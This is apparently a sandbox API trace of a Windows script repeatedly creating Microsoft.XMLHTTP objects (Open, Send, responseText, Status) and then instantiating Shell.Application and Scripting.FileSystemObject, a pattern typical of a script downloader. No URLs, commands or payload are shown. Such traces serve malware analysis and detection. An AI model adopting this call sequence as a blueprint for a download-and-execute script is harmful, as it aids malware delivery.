	[0412.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0412.432] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0412.432] SysStringLen (param_1=0x0) returned 0x0
	[0412.432] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0412.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0412.433] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0412.433] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0412.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0412.433] ??2@YAPEAX_K@Z () returned 0x62f310
	[0412.433] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f310) 
	[0412.433] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0412.433] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0412.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0412.433] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0412.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.433] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0412.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0412.433] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0412.433] SysStringLen (param_1=0x0) returned 0x0
	[0412.433] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0412.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0412.434] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0412.434] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0412.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0412.434] ??2@YAPEAX_K@Z () returned 0x62f330
	[0412.434] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0412.434] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0412.434] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0412.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0412.434] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0412.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.434] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0412.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0412.434] longjmp () 
	[0412.434] longjmp () 
	[0412.435] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0412.435] SysStringLen (param_1=0x0) returned 0x0
	[0412.435] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0412.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0412.435] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7290) returned 0x0
	[0412.435] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0412.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72f8) returned 0x0
	[0412.435] ??2@YAPEAX_K@Z () returned 0x62f310
	[0412.435] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72f8, pUnkSite=0x62f310) 
	[0412.435] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0412.435] XMLHTTPRequest:IUnknown:Release (This=0x49c72f8) returned 0x0
	[0412.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7290) returned 0x0
	[0412.435] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7290) returned 0x3
	[0412.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.435] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0412.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0412.436] longjmp () 
	[0412.436] longjmp () 
	[0412.436] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0412.436] SysStringLen (param_1=0x0) returned 0x0
	[0412.436] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0412.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0412.436] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0412.436] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0412.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0412.436] ??2@YAPEAX_K@Z () returned 0x62f330
	[0412.436] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0412.436] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0412.436] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0412.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0412.437] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0412.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.437] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0412.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0412.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.437] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0412.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0414.044] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0414.044] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0414.044] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0414.044] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0414.044] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0414.044] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0414.044] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0414.044] SysStringLen (param_1=0x0) returned 0x0
	[0414.044] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0414.045] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0414.045] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0414.045] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0414.045] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0414.045] ??2@YAPEAX_K@Z () returned 0x62f350
	[0414.045] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0414.045] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0414.045] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0414.045] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0414.045] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0414.045] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0414.045] SysStringLen (param_1=0x0) returned 0x0
	[0414.045] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0414.048] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0414.048] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0414.048] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0414.048] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0414.048] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0414.048] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0415.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0415.018] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
